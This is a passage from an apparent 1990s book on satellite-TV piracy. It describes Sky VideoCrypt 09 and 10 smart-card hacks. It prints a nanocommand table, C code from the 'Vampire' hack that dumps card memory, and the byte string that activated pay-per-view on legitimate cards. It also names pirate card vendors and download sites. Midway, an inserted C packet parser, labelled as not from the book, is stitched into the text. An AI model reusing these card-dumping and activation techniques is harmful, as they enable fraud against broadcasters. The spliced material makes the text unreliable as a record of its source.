that instead of including a batch of card id numbers to be turned on or off, it 
had a set of instructions that the card reads and processes. 


The card id numbers and indeed the nanocommands were encrypted with a 
small algorithm. This algorithm used the Card Age byte (Byte 01) and the 
Nanocommand Decrypt Key byte (Byte 02) as the seeds. The output of the 
algorithm was EXORed with the Packet Command byte (Byte 03), the Card 
ID bytes (Bytes 07 - 10) and the nanocommand bytes (Bytes 12 - 26). In an 
ordinary card turn on/off packet these nanocommand bytes would be the 
least significant bytes (fifth byte) of the card ids to be addressed by that 
packet. 


The Card Age byte generally changed each month. It is possible to generate 
a table of outputs for a given Card Age byte and each possible Nanocommand 
Decrypt Key. These tables were published regularly in the Usenet 
newsgroup alt.satellite.tv.europe. While this was not strictly necessary once 
the algorithm is known, a lot of people used these tables in their home made 
blocker programs for the PC. 


The Packet Command value that indicates a nanocommand packet was 
generally 80h. This meant that the card interpreted bytes 12 to 26 as being 
instructions to be acted on. 


By using these nanocommands, Sky was able to write to the cards while 
they were in the blockers. The interesting thing is that during the lifetime of 
the Phoenix, it was pointed out that the sequence of the least significant 
bytes of the card id had become irregular. With the 07 issue, the values 
were consecutive. The significance of this was generally overlooked by the 
hackers at the time. It became painfully clear to the pirates when the 
Phoenixed 09 cards started to be killed in the blockers. 
The use of nanocommands in the over the air addressing scheme is a very 
powerful and dangerous option. It is powerful because it gives a somewhat 
limited addressing system a new lease of life. It is dangerous in that it also 
gave the potential hacker a whole new set of tools to play with. It was a set 
of tools that proved fatal to the 09 card as it allowed the hackers and pirates 
to dump out the address space of the card. 


Some of the nanocommands just execute the hash function twice with 00h 
as the input. It may have been that these nanocommands were left relatively 
unprogrammed for future use. There is a clear difference between 
nanocommands that appear to be purely cryptographic (iterate the hash 
function) and those that can load or read data from memory. 


A central element of the nanocommand concept is the pointer. This pointer 
value is incremented by the number of bytes in the nanocommand after 
each nanocommand is executed. In some of the nanocommands, the 
pointer value is used as the input to the hash function. This further 
complicated the procedures and made the nanocommands more difficult to 
initially understand. 


Purely Cryptographic Nanocommands 

0Ch (2 Bytes)  Iterate Hash Twice. Inputs: 00h On Each Round 
14h (5 Bytes)  Iterate Hash Twice. Inputs: 00h On Each Round 
1Dh (2 Bytes)  Iterate Hash Twice. Inputs: 00h On Each Round 
24h (3 Bytes)  Iterate Hash Twice. Inputs: 00h On Each Round 
34h (4 Bytes)  Iterate Hash Twice. Inputs: 00h On Each Round 
FFh (1 Byte)   Iterate Hash Twice. Inputs: 00h On Each Round 
3Ch (1 Byte)   Iterate Hash Twice. Inputs: 3Ch On Each Round 
41h (1 Byte)   Iterate Hash Twice. Inputs: 41h and 00h 
49h (1 Byte)   Iterate Hash Twice. Inputs: 60h and 49h 
19h (1 Byte)   Iterate Hash Twice. Inputs: Pointer and 19h 
03h (1 Byte)   Iterate Hash 64 Times Then Break. Inputs: Pointer 

Control Nanocommands 

46h (1 Byte)   Break And Exit Nanocommand Processing 

Read/Write Nanocommands 

09h (3 Bytes)  Format: 09h xx yy 


This is an address loader for the 30h nanocommand where xx is the MSB of 
the address and yy is the LSB of the address. The hash function is then 
iterated twice with input values 63h and 00h. 
0Fh (2 Bytes)  Format: 0Fh aa 

Writes the data aa to the address defined by the values stored in BFh (holds 
the MSB of the address) and C0h (holds the LSB of the address). 


11h (3 Bytes)  Format: 11h aa xx yy 

Writes the data aa to the address xx yy where xx is the MSB and yy is the 
LSB. 


30h (2 Bytes)  Format: 30h cc 


This is specifically a read command. The value cc is the number of bytes to 
be read. The starting address is set by the address loaded by the 09h or the 
11h nanocommand. The maximum number of bytes that can be read is 
127. If cc is zero then only a single byte is read. The hash function is 
iterated with each byte read. 


39h (2 Bytes)  Format: 39h aa 

Writes the data aa to address 0092h and then iterates the hash function with 
input 00h. 

11h (4 Bytes)  Format: 11h aa xx yy 

Writes value aa to the address in RAM specified by xx yy. The Sky 09 card has 
128 bytes of RAM, from 0080h to 00FFh. If the value in xx is non-zero, 
indicating a ROM address, the write operation is not executed. 


28h (5 Bytes)  Format: 28h aa bb cc dd 

Writes the nanocommand string aa bb cc dd to RAM addresses 008Dh to 
0090h. It then iterates the hash function twice with the input values dd and 
pointer. 
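As an added example (not code from the book or from any of the programs it describes), the pieces described in this chapter put together as a C parser for analysing captured 74h packets: the 27-4-1 layout and modulo checksum from "Phoenix In Operation", the decrypt table fragment from the 09 packet description, and the nanocommand lengths listed above. It assumes 8-bit arithmetic in the decrypt fragment, takes 11h as four bytes as its format shows, leaves the card id root (bytes 7-10) untouched because the text does not say which table byte covers it, and uses as its sample the example 0x74 message from the Vampire fragment later in this chapter.

```c
/* Added example (not the book's or any pirate program's code): structural
 * parser for an 09-card 74h packet. The 4 byte hash signature is not checked. */
#include <stdint.h>
#include <string.h>

#define PKT_LEN  32    /* 27 data + 4 hash signature + 1 modulo checksum */
#define NANO_OFF 12    /* bytes 12..26: nanocommands, or fifth bytes of card ids */
#define NANO_LEN 15

uint8_t modulo_checksum(const uint8_t *pkt)
{
    uint8_t sum = 0;
    for (int i = 0; i < PKT_LEN - 1; i++) sum += pkt[i];
    return (uint8_t)(0u - sum);   /* byte 31: 32-byte sum becomes a multiple of 256 */
}

/* Four-byte table seeded by the Card Age byte (1) and the Nanocommand Decrypt
 * Key byte (2): the algorithm fragment given earlier, in 8-bit arithmetic. */
void nano_xor_table(const uint8_t *msg, uint8_t tbl[4])
{
    uint8_t xx = msg[1] ^ msg[2];
    xx = (uint8_t)((xx >> 4) | (xx << 4));     /* swap nibbles */
    uint8_t b = msg[2];
    for (int i = 0; i < 4; i++) {
        b = (uint8_t)((b << 1) | (b >> 7));    /* rotate left by one bit */
        tbl[i] = (uint8_t)(xx + b);
        b = tbl[i];
    }
}

/* XOR is its own inverse, so one routine encrypts and decrypts. Table byte 0
 * covers the Packet Command, byte 2 the nanocommand field; the text does not
 * say which byte covers the id root (bytes 7-10), so those are left alone. */
void nano_xor_apply(uint8_t *msg)
{
    uint8_t tbl[4];
    nano_xor_table(msg, tbl);
    msg[3] ^= tbl[0];
    for (int i = 0; i < NANO_LEN; i++) msg[NANO_OFF + i] ^= tbl[2];
}

/* {opcode, total length} as listed above (11h taken as 4 bytes: 11h aa xx yy). */
static const uint8_t NANO_TABLE[][2] = {
    {0x0C,2},{0x14,5},{0x1D,2},{0x24,3},{0x34,4},{0xFF,1},{0x3C,1},{0x41,1},{0x49,1},
    {0x19,1},{0x03,1},{0x46,1},{0x09,3},{0x0F,2},{0x11,4},{0x30,2},{0x39,2},{0x28,5},
};

static int nano_length(uint8_t op)
{
    for (size_t i = 0; i < sizeof NANO_TABLE / sizeof NANO_TABLE[0]; i++)
        if (NANO_TABLE[i][0] == op) return NANO_TABLE[i][1];
    return -1;                                 /* not in the published list */
}

typedef struct { uint8_t op; uint8_t arg[4]; } nano_insn;
/* Walk the nanocommand field of a DECRYPTED packet. Returns the number of
 * instructions decoded, or -1 for an unknown opcode, a 30h count above the stated
 * maximum of 127, or a command running past byte 26. *broke: 03h/46h ended it. */
int walk_nanocommands(const uint8_t *msg, nano_insn *out, int max_out, int *broke)
{
    int n = 0, pos = 0; *broke = 0;
    if (msg[3] != 0x80) return 0;              /* not a nanocommand packet */
    while (pos < NANO_LEN && n < max_out) {
        uint8_t op = msg[NANO_OFF + pos];
        int len = nano_length(op);
        if (len < 0 || pos + len > NANO_LEN) return -1;
        out[n] = (nano_insn){ .op = op };
        memcpy(out[n].arg, &msg[NANO_OFF + pos + 1], (size_t)(len - 1));
        if (op == 0x30 && out[n].arg[0] > 127) return -1;
        n++;
        pos += len;                            /* the pointer advances by length */
        if (op == 0x03 || op == 0x46) { *broke = 1; break; }
    }
    return n;
}

/* Constructed sample: the plaintext example 0x74 message from the Vampire
 * fragment (09 ff ff loads an address, 30 00 reads one byte, 46 breaks). */
const uint8_t SAMPLE_MSG[PKT_LEN] = {
    0xe8, 0x43, 0x66, 0x80, 0x00, 0x00, 0x0c, 0x89,
    0x01, 0x02, 0x03, 0x00, 0x09, 0xff, 0xff, 0x30,
    0x00, 0x46, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19,
    0x19, 0x19, 0x19, 0xff, 0xff, 0xff, 0xff, 0xff
};

/* Opcode of the sample's i-th decoded nanocommand, or -1 past the end. */
int sample_op(int i)
{
    nano_insn insn[NANO_LEN]; int broke;
    int n = walk_nanocommands(SAMPLE_MSG, insn, NANO_LEN, &broke);
    return (i >= 0 && i < n && broke) ? insn[i].op : -1;
}

/* Byte i of a copy of the sample after the XOR layer has been applied. */
int sample_encrypted_byte(int i)
{
    uint8_t pkt[PKT_LEN];
    memcpy(pkt, SAMPLE_MSG, PKT_LEN);
    nano_xor_apply(pkt);
    return (i >= 0 && i < PKT_LEN) ? pkt[i] : -1;
}
```

Note that the sample's signature field and checksum byte are placeholders (FFh), so modulo_checksum() reports the byte the packet would need rather than confirming the one it carries.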


Memory Map Of The 09 Sky Card and DSS 01 Card (MC68HC05SC21) 

0000-009F  Registers 
0080-00FF  RAM (128 Bytes) 
0520-10FF  EEPROM 
1100-1FF7  ROM Page 0 
1100-19FF  ROM Page 1 
1FF8-1FFF  ROM User Vectors 

RAM: 128 Bytes 
ROM: 6144 Bytes 
EEPROM: 3008 Bytes 

The best way to understand the operation of the nanocommands and how the 
various areas of memory are selected is to examine the source code of one of 
the Vampire programs available for popping the 09 Sky cards. One of the 
better programs for this is the GETROM program. This is available from most 
good BBSes and the WWW and FTP sites listed earlier in the book. 
The VideoCrypt Vampire Hack 


The downfall of the 09 card may be attributable to the use of the 
nanocommands. As the knowledge of the hackers grew, the applications of 
the nanocommands became clear. Of course there was a learning curve 
here. The hackers really had to examine the packets coming over the air 
and watch News Datacom and Sky using the nanocommands. In this 
manner it was possible to build up a list of the nanocommands. The 
commercial hackers, however, did things differently. Since most of them 
had dumped the card it was again a learning curve, but they had an 
advantage: they had the full dump. The ordinary hackers had to wait and 
see. 


In a move that would have been clever otherwise, News Datacom had 
made it possible to use a byte from anywhere in the entire address space of 
the smart card as the input to the hash function. It was as if News Datacom 
had read the first part of a two part article I wrote a few years ago about this 
technique. The second part of the article was about the dangers of using 
such a technique - primarily the fact that it would also allow the memory 
space to be dumped if the algorithm was compromised. This is exactly what 
happened with the 09 and the nanocommands. Describing them as a Trojan 
Horse would be a very bad pun. 


The Vampire hack is effectively where the lifeblood of the smart card, its 
memory space, is extracted. It is, I admit, a rather gruesome name but the 
alternative was the "Count Zero" hack. In some respects this hack built on 
the knowledge obtained during the Phoenix hack. It used a lot of the same 
source code. 


There are four requirements for the Vampire hack. The first is a working 
implementation of the hash function. This is necessary as the state of the 
answer bytes has to be tracked through the whole process. The hash 
implementation is also required to generate a valid hash signature for the 
packet. 


The second requirement is the algorithm for generating the EXOR tables. 
These codes will be EXORed with the packet data before the checksum is 
generated. On some of the earlier versions of the Vampire hack, the 
algorithm for generating the EXOR table was not available so the complete 
EXOR table for that month was included in the source code. 


The third requirement is a working knowledge of the nanocommands. The 
basic commands in the Vampire hack are the 09h address loader, the 30h 
data processor and the 03h break. It is necessary to know how many hash 
iterations are effected by each nanocommand. 
The fourth requirement is some sort of recovery routine. This routine will 
exhaustively search for the data byte used in the 30h command. This is 
perhaps the most intensive part of the algorithm and some hackers decided 
to leave this stage until after the results are obtained from the card. 


Stage 1: Nanocommand Generation 


Basically this stage involves setting the address bytes that follow the 09h 
command. 


Stage 2: Encryption Of Packet Data 


This is where the Nanocommand Decrypt Key algorithm is applied to the 
packet data. It EXORs the output of the encrypt algorithm with the 
nanocommands and other data. 


Stage 3: Hash Signature Generation 


The packet presented to the card has to have a valid hash signature 
otherwise the card will reject it. Again the working implementation of the 
hash function is required. In many respects this process is identical to the 
original Phoenix program. 


Stage 4: Packet Sent To Card 


The Vampire packet is sent to the card. The circuitry used for this stage is 
the same as that used for the Phoenix hack. 


Stage 5: Answer Packet (78) Recorded 


The answer packet from the card would be recorded in a file along with the 
address of the data, the nanocommands used and the state of the answer 
bytes just prior to the execution of the nanocommands. Alternatively the 
process could be executed prior to stepping to the next byte. 


Stage 6: Data Recovery 


Theoretically this is a simple stage. In practice it is complex. The state of the 
answer bytes prior to the execution of the nanocommands is known. 
Therefore by iterating the hash function to try and obtain the same results it 
is possible to comparatively recover the data. The process used here is an 
exhaustive search. The potential for errors does exist but it is the simplest 
way, short of reverse-engineering the card, of obtaining the contents of the 
card memory. 


There are now at least three different programs available for dumping the 
contents of the Sky 09 card. The commonest one is the GETROM program. 
Two disassembler programs exist for decompiling the Sky 09 smart card 
program. 
Fragment Of The Vampire Hack Code 

Courtesy Of Markus Kuhn 

(de_xor, kernel_b, decode, query and adr_space are defined elsewhere in 
the program; only the nanocommand handling and the ROM reader are 
shown here.) 

    /* The token stuff in decode_b: */ 
    de_xor(msg); 
    if (msg[3] == 0x80) { 
        abort_loop = 0; 
        /* process special ECM nanocommands */ 
        for (s = 0; s < 15 && !abort_loop; s++) 
            switch (msg[s + 12]) { 
            case 0x03: 
                abort_loop = 1; 
                s--; 
                break; 
            case 0x09: 
                adr = msg[++s + 12] << 8; 
                adr |= msg[++s + 12]; 
                kernel_b(0x63, answ); 
                kernel_b(0, answ); 
                break; 
            case 0x19: 
                kernel_b(s, answ); 
                kernel_b(0x19, answ); 
                break; 
            case 0x30: 
                s++; 
                for (j = msg[s + 12]; j >= 0; j--) { 
                    if (rom_try >= 0) 
                        b = rom_try; 
                    else 
                        b = adr_space[(adr + j) & 0x1fff]; 
                    kernel_b(b, answ); 
                } 
                kernel_b(b, answ); 
                kernel_b(0xff, answ); 
                break; 
            case 0x46: 
                final = 0; 
                abort_loop = 1; 
                break; 
            default: 
                s += 0xcb; /* ??? mc */ 
            } 
    } 
    /* final 64 iterations */ 
    for (i = 0; i < final; i++) 
        kernel_b(s, answ); 
    answ[7] &= 0x7F; /* only 60-bit are needed by decoder */ 


    /* and the horrible rom sucker ... */ 

    void suck_rom(void) 
    { 
        long address; 
        extern int rom_try; 
        int match; 
        unsigned char card_answ[8], season7_answ[8]; 
        unsigned char msg[32] = { /* an example 0x74 message */ 
            0xe8, 0x43, 0x66, 0x80, 0x00, 0x00, 0x0c, 0x89, 
            0x01, 0x02, 0x03, 0x00, 0x09, 0xff, 0xff, 0x30, 
            0x00, 0x46, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 
            0x19, 0x19, 0x19, 0xff, 0xff, 0xff, 0xff, 0xff 
        }; 

        for (address = 0x1ff0; address < 0x2000; address++) { 
            fprintf(stderr, "%04lx\r", address); 
            msg[13] = address >> 8; 
            msg[14] = address & 0xff; 
            /* create signature */ 
            de_xor(msg); 
            decode(msg, season7_answ); 
            de_xor(msg); 
            /* ask card */ 
            query(msg, card_answ); 
            /* compare with all possible values mc */ 
            match = -1; 
            for (rom_try = 0; rom_try < 256; rom_try++) { 
                decode(msg, season7_answ); 
                if (!memcmp(card_answ, season7_answ, 8)) { 
                    if (match >= 0) 
                        fprintf(stderr, "Doublematch at %04lx: %d and %d!\n", 
                                address, match, rom_try); 
                    else { 
                        match = rom_try; 
                        printf("%04lx: %3d %02x %c\n", address, match, match, 
                               (match < 32 || match > 126) ? '.' : match); 
                    } 
                } 
                de_xor(msg); 
            } 
            if (match == -1) 
                printf("%04lx: ??????????????\n", address); 
            de_xor(msg); 
        } 
        return; 
    } 


The 09 Season Program 


The first working 09 Season program appeared on Christmas Eve 1994. It 
was the product of a group working outside of the TV-Crypt. By January 1995, 
the implementation was stable. The initial version was PC based. An Apple 
Mac version followed. This hack was called the Deep Space 9 hack though 
some more correctly knew it as the Deep Sh*t 9 hack - an exact appraisal of 
Sky's situation. 


However later that Spring, the frustration of seeing all the self-styled experts 
claiming authorship boiled over. The source code for the program, which had 
been kept in fairly limited distribution, was publicly released. The number of 
09 Season implementations mushroomed. 


The source code for the 09 hacks could not be included here due to space 
constraints. However it will be included on the Black CD-ROM currently in 
preparation. 
Black Tuesday - The 09 To 10 Transition 


Around 10:00 on Tuesday the 31st it started; a few channels at first. It was 
like a public execution of old. The trapdoor opened. The condemned fell 
through. The rope slowly, painfully and all too visibly choked the life out of 
the condemned. It was the 09 code that played the role in this drama. By 
sunset it was all over. Both pirate and official 09 cards were dead. 


This was no ordinary 09 ECM. The date code had changed to 86h. A few 
hours earlier it had been date code 51h. In terms of months the date code 
had advanced fifty three months - just over four years. 


In a mad panic, some people tried every one of the SEASON programs in 
the vain hope that one at least would decode the new codes. None did. 
Some pirate card users telephoned their dealers and got through to 
answering machines. But this time it was different. The pirate card users, 
had in the main, been briefed to expect this switchover. Most of them had 
gotten more than their money's worth from the pirate cards. 


In the final months of the 09 code, the prices for PIC16C84 based pirate 
cards had dropped to around £25 with a £5 upgrade charge each time there 
was an ECM. This time around there would be no cheap upgrade. As with 
the last days of the 07 code, the market had become saturated with pirate 
cards. With the 09 code, there was a very clear reason for this saturation - 
the total collapse of security on the PIC16C84 chip. After all it could be 
popped with a diode. As a result everyone had the 09 code. 


From the start there were murmurs that the new code would not be as freely 
available. More secure microcontrollers would be used the next time around. 
This would ensure that the new code remains secure. It seems ironic now 
that even the pirates had problems with pirates. At the moment the only chip 
that has not been overtly popped is the Dallas Semiconductor 5002FP. This 
is the microcontroller used on the Megatek, Cardtronics and Benedex 
Battery Cards. 


Within a few hours of the switchover, an update appeared on Megatek's 
world wide web (WWW) homepage. It stated that the Sky 10 code had gone 
into operation on the morning of 31/10/95. It pointed out that Megatek would 
have the new code for the Battery Card available in six to eight weeks. It 
was to be April 5th 1996 before the first working Megatek Battery card 
appeared. That day, Easter Friday, is also known as Good Friday in Ireland. 
For the pirates it was a downright excellent day. The range of headlines was 
staggering. It could have been called the Crucifixion hack or the Resurrection 
hack. In the end only one thing mattered - the Sky 10 card had fallen 
prey to the pirates once more. 
The Collapse Of Sky 10 PPV 


"PPV customers will have to ring our subscriber management 
centre to get their cards authorised for a particular event. 
We think that we've got a pretty safe system." 

David Elstein, Sky's director of programming, expressing his confidence 
in the security of Sky's PPV. 


Well the system may be pretty but it was definitely not safe. The hack on 
VideoCrypt's PPV system was an embarrassment for Sky though it was not 
the complete disaster that it could have been. 


The time between Black Tuesday and Good Friday was not uneventful. In 
the midst of all the fake blocker code and fake activator code, one event 
shook Sky to the core. Their first public PPV event, the showing of the 
Bruno-Tyson Fight, was compromised. It was expected that the event would 
be hacked on TV1000 and via the DDT hack on VideoCrypt. What occurred 
staggered most people associated with the business - a Phoenix hack 
authorised the PPV event on existing Sky 10 cards. 


The Phoenix hack surfaced early in the morning (approximately 0300 Hrs) 
of 16/03/1996 as a message from one Sam Chisum. Naturally this was an 
alias. We do not believe that this was the same Sam Chisholm associated 
with Sky. The message stated that a set of data when sent to a Sky 10 card 
would activate PPV and give the EVENTS PAID 66 message. At that time, it 
was a case of hoping that it would work. The event was not due to start until 
the early hours of Sunday morning so there was no reliable way of testing it 
in advance. 


Most hackers had made alternative arrangements - the fight was also being 
shown on TV1000. Many, however, were eager to try out the new hack. 
Some, having seen the original message on various BBSes and newsgroups, 
took the data and incorporated it into phoenix programs. The 
FREETYSO.EXE was perhaps the most widely used one primarily because 
its author did such a good job of distributing it. 


By lunchtime on Saturday, the hack was coded into the format of an EXE 
file that could be used with the Phoenix / Season interfaces. The European 
satellite newsgroups on usenet were flooded with uuencoded versions of 
the new PPV activator program. These programs were also uploaded to all 
of the major satellite television BBSes in Europe. Some UK BBSes also 
carried them. 


The hack also appeared at all of the major WWW sites handling satellite 
television hacks. The Paranoia site (www.paranoia.com/~defiant) referred 
to in the message is one of the main sites for this kind of software. It is situated 
in the USA, well outside UK jurisdiction. Most of the UK sites handling this 
type of software did not have it posted. However, the usenet groups were 
carrying the software. 


By the time Sky started to transmit the fight, there were obviously thousands 
of extra viewers either via TV1000 or via Sky. The reason for the low 
estimate is that the main event took place at 0500 Hrs when most people 
would be asleep. 


Sky and News Datacom were obviously not asleep. It would probably be 
accurate to say that they were in a mad panic. ECMs were tried and they 
failed. This went on as the night progressed. It was futile. The hackers had 
won and Sky's PPV mechanism lay smashed. 


It is very difficult at this stage to ascertain the number of legitimate Sky 
cards that were activated for the event by the Phoenix hack. With the 
growing accessibility of the internet and dial-up BBSes, the figure is probably 
under fifty thousand. The problem for Sky is not the immediate losses 
caused, but rather the loss of credibility. In order to have a reliable income 
from a PPV event, it is first necessary to have a reliable and secure system 
of delivery. If the system is compromised, then further events are in danger. 


The fact that Sky are making noises about implementing some form of PPV 
in late 1996 should be worrying for the film producers. If the PPV event can 
be hacked once, then there is a very real chance that it will be hacked again. 
Given that the pirate Battery cards are in operation, there is a whole new 
avenue of piracy opening up in Europe. 


The Message That KO'd Sky's PPV 


send this header to your card via a season interface followed 
by the bytes below 

53 86 01 00 2D 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 00 00 00 00 00 db 
fd f0 b7 


and your card will gain the credits for the Tyson Fight. I don't know about 
cards that are turned off but they gain the events anyway 


Sam Chisum. 


Important: please distribute this file as quick as possible can somebody 
put it on Paranoia. 
The Sky 10 Card 


There are two chips on the Sky 10 card. This is the reason for the extra 
pads. These pads, while electrically being ISO compatible are just to cover 
the larger area occupied by the 10 card’s chips. 


One of these chips is a Siemens smart card microcontroller. The other is an 
ASIC. It was the ASIC that was to cause most problems to the pirates intent 
on reverse engineering the card. Reversing the microcontroller was a 
straightforward operation and was completed before the activation of the 10 
card. The ASIC, however, took slightly longer. 


The card is based on a Siemens microcontroller and it has some very 
strong commonalities with the Dallas 5002FP. Both the Siemens smart 
cards and the Dallas 5002FP are based on 8051 architecture and op-codes. 
While the Dallas 5002FP boasts all sorts of security elements, the 
Siemens chips have modified the architecture to allow the instructions to be 
executed faster. They can also work from 1.0 to 7.5 MHz. Other 
modifications to the op-codes can be expected. It is a common tactic with 
customised microcontrollers to make some commands behave differently 
and in some cases inversely. This makes emulating them with a conventional 
microcontroller more complex as one command on the smartcard 
may take two or three on the pirate emulator. 


The clock speed of the interface on the VideoCrypt decoder is set by the 
Answer to Reset. This is the packet returned by the card to the decoder 
when it is inserted. It still takes a 3.5 MHz clock. 


According to some sources, the ASIC is on the serial data line and acts as 
a UART or buffer for the data flowing to the microcontroller. In this manner 
the microcontroller can process the data in a more orderly fashion, 
requesting bytes from the ASIC when it is ready to process them. As a 
result, cycles are devoted to a more complex algorithm than that used in the 
07 and 09 cards. 


The use of the ASIC is not limited to the seed generation. It is believed that 
the authorisation and deauthorisation procedures rely heavily on the ASIC. 
This means that a Phoenix interface for the 10 card would have to have a 
working Sky 10 ASIC as part of the set up. This would not be difficult for 
people used to working with the card. 


If the card’s microcontroller is a Siemens chip, then the question as to the 
exact chip has to be examined. There are four candidates. The specifications 
for cards are given in the table below: 

Type        ROM   EEPROM  RAM        PROM 
SLE 44C10   8K    1K      256 bytes  32 bytes 
SLE 44C40   8K    4K      256 bytes  32 bytes 
SLE 44C80   16K   8K      256 bytes  32 bytes 


There is a more advanced processor type available from Siemens. This 
microcontroller includes a Crypto Coprocessor for handling RSA calculations. 
Of course this is the more expensive option, and one that News 
Datacom would be unlikely to go for unless they intended to introduce 
Digital Television in the lifetime of the 10 card. This seems unlikely as the 
10 card seems to be intended to last until late 1997. Sky intends to 
introduce digital television by then. 


Type         ROM   EEPROM  RAM              PROM 
SLE 44C200   8K    2.5K    256 + 350 bytes  32 bytes 


Trying to narrow the options down is difficult though not impossible. The 
most obvious choice for the new card would be the SLE44C80. The reason 
for this is that the SLE44C40 is more similar to the Motorola IC used for the 
09 issue and the SLE44C200 might be too expensive and it would be 
overkill considering that the Sky 10 card also contains an ASIC. 


The Megatek 10 Battery Card 


On April 5th 1996, the death of the Sky 10 card was announced. Megatek 
declared that their pirate Sky 10 cards were available. In Ireland, the day 
was Easter Friday, otherwise known as Good Friday. 


The range of possible headlines was startling. Could it be called the 
Crucifixion hack as it came to prominence on Good Friday? Or could it be 
called instead the Resurrection hack as it signaled the restarting of the 
pirate Sky card market? In either case, the ramifications for Sky are dire. 
The hack on the Sky 10 card had finally hit the market and with it any 
confidence in the future of Pay Per View on the 10 card should evaporate. 


For the weeks prior to this announcement, the rumours flowed through the 
pirate world. The launch of the pirate hack was imminent though nobody 
was sure when exactly it would occur. Some were expecting a hack to 
surface around the time of the Cable And Satellite Show in London (15, 16, 
17th April). The Megatek WWW page did mention that the delivery would 
occur within seven to ten days. This put the time very close to the Cable And 
Satellite show. It was another humiliating show for Sky. This was to be their 
third Cable and Satellite show in a row where their card had been 
compromised. 


The Megatek battery card is based on the Dallas 5002FP microcontroller. 
This microcontroller has proven to be one of the more robust microcontrollers 
in terms of security and most of the attempts at popping it have not 
been successful. This clearly differentiates it from the simply popped 
PIC16C84. Of course even the Dallas 5002FP is not sufficient to emulate 
the Sky 10 card. 


The ASIC (Application Specific Integrated Circuit) in the Sky 10 card was 
perhaps one of the major factors in the delay in getting the 10 hack to the 
market. It is a 4500 gate ASIC and it was essential that it was 
reverse-engineered and emulated for the hack to work. Megatek stated that they 
had a specially developed integrated circuit, called the “Skylark” chip 
mounted on this extra board. 


The Megatek "Skylark" chip is an ACTEL A1280XL. This device has 8000 
gates and the data sheet is available from the ACTEL Corporation's WWW 
site. Megatek had scrubbed the identification numbers from the device. It is 
essentially identical to the official Sky ASIC. The result is that even if the 
pirate ASIC supply is interdicted, the hackers and pirates can still use the 
ASIC from official cards. Currently there is a growing trade in deauthorised 
official Sky 10 cards. These either end up being scavenged for their ASIC or 
turned into Phoenixed 10 cards. 


The upgrade to the existing battery card also required the Dallas 
5002FP to be reprogrammed. As a consequence of this, the upgrade card 
could no longer decode the D2-MAC EuroCrypt channels. 


Megatek were injuncted by an order from the Irish High Court gained on foot 
of the UK proceedings. As a result they are no longer able to trade. 
However this does not mean that the supply of pirate 10 cards has been 
stopped. Pirate battery cards are still widely available throughout Europe 
and Cardtronics (http://www.iol.ie/~ctx) seem to have taken over Megatek's 
market position. 


News Datacom implemented an ECM against the Battery cards on 
05-August-1996. It was effective and it knocked out every battery card 
design in Europe. However the Phoenixed 10 cards are still operational. It is 
expected that the new update codes for the Battery cards will be available 
within a few days. 
VideoCrypt-II (VC-2) 
The VideoCrypt-II system was developed for use in Europe as opposed to 
the VideoCrypt-I system which was only employed in Ireland and the UK. 
The system is a direct evolution of the VideoCrypt-I system and the 
technology and the protocols are largely the same. 


The primary reason for developing this variant was to serve a growing 
European market. Some channels such as Discovery had deals with 
European cablenets and as a result they wanted to serve the European 
satellite market as well. The strength of the VideoCrypt-II variant is that its 
datastream can be carried simultaneously on a VideoCrypt-I encrypted 
channel. Therefore the one channel can be distributed in two copyright 
areas using different cards. 


It is not known if the variant was a somewhat less than successful 
byproduct of a Sky/Murdoch plan to enter into the wider European market. 
At the moment FilmNet is using the variant for a movie service aimed at 
Eastern Europe. MTV and Discovery are also using the variant but it has not 
been widely successful. There are continuing rumours that the hard core 
version of the Adult Channel, Eurotica, will switch to this variant for 
European distribution. However some sources consider that the real reason 
that the Adult Channel is not too worried about piracy is that it makes more 
money from the premium phoneline services advertised on its channels 
than it makes from the subscriptions. Moving from one compromised 
variant (VideoCrypt 07) to another compromised variant would only result in 
extra hassle and a minimum of subscribers. This is because the channel 
has to compete with the hardcore porn output from TV1000 and FilmNet. 


The VideoCrypt-II system has some slightly different packet sizes compared 
to VideoCrypt-I. This tends to confirm that News Datacom has 
resolved some of the problems they had with implementing the Fiat Shamir 
ZKT on VideoCrypt-1. 


According to some sources, the ZKT is used in the seed generation. The 
ZKT result is EXORed with the hash function output in order to obtain the 
correct seed result. Therefore if the theory of the operation of the ZKT is not 
fully understood by the hacker or pirate then the hacker card will not work 
properly even though it is producing the correct result from the hash 
function. 


Apart from the integration of the ZKT into the seed generation, there are 
other refinements. The data rate of the card in the VC-2 is 38K4. This allows 
for a higher rate of data and it makes developing a pirate card more difficult 
as the timing is more critical. The fact that the PIC16C84 does not have a 
multiply instruction seems to be exploited by this as the ZKT involves a lot of 
such calculations. Therefore the ZKT routines on the official card would 
naturally be faster. 


Many of the hacks on the VideoCrypt-II variant have been Battery card 
based hacks. Recently there have been reports of PIC16C84 based hacks 
in Italy. However in an attempt to stop the program being dumped from the 
PIC16C84, one of the pins essential to the serial programming procedure 
has been cut by drilling into the case thus severing the line. This was a fairly 
simpleminded attempt and it would not actually stop anyone who understood 
electronics, rather than computer science, from popping the top of the 
chip and rebonding the pin. It may well be as simple as just popping the top 
of the chip and resoldering the pin with a fine tip soldering iron. According to 
some sources this is how the VC-2 PIC16C84 was popped. 


The VideoCrypt-II variant currently uses a Sky 07 algorithm with a different 
keyset. The use of the ZKT in the process means that the usual 
cryptographic approach to recovering the keyset will not work as the ZKT 
result has to be EXORed against the seed to remove it from the equation. 
And if the data sets for doing this were known, then there would be no 
reason to try and recover the key. 


The primary difference in the packet sizes between VideoCrypt-I and 
VideoCrypt-II is that the 72h and 7Ch packets are 64 bytes (40h) long. This 
would indicate that there is an extra level of tiering and authentication 
compared to the VideoCrypt-I packet lengths. 
VideoCrypt-S 
VideoCrypt-S was developed by News Datacom, Thomson and the BBC. 
The primary user of the system is the BBC Select service. This was an after 
hours pay television service. It carries varied programming from medical 
programming to business advisory programming. Above all these programmes 
were intended for audiences who are willing to pay. 


Through a combination of factors, the Select service collapsed. VideoCrypt-S 
decoders can actually be purchased on the surplus market for about £5 
per decoder in quantity. It was a pitiful end for such a system. However it 
does seem to indicate that national television stations fare badly in pay 
television because they do not have the correct ruthless attitudes to survive 
in the Pay-TV market. 


The time slot of the programming holds its own special problem. Since the 
programmes were being aired after the main channels had closed down, 
most of the potential viewers would be asleep. Therefore it was necessary 
to include a timing circuit so that the programme could be videotaped for 
later playback. 


The cut and rotate technique of scrambling can send shivers down the 
spines of cable television engineers. The main technique of cable distribution 
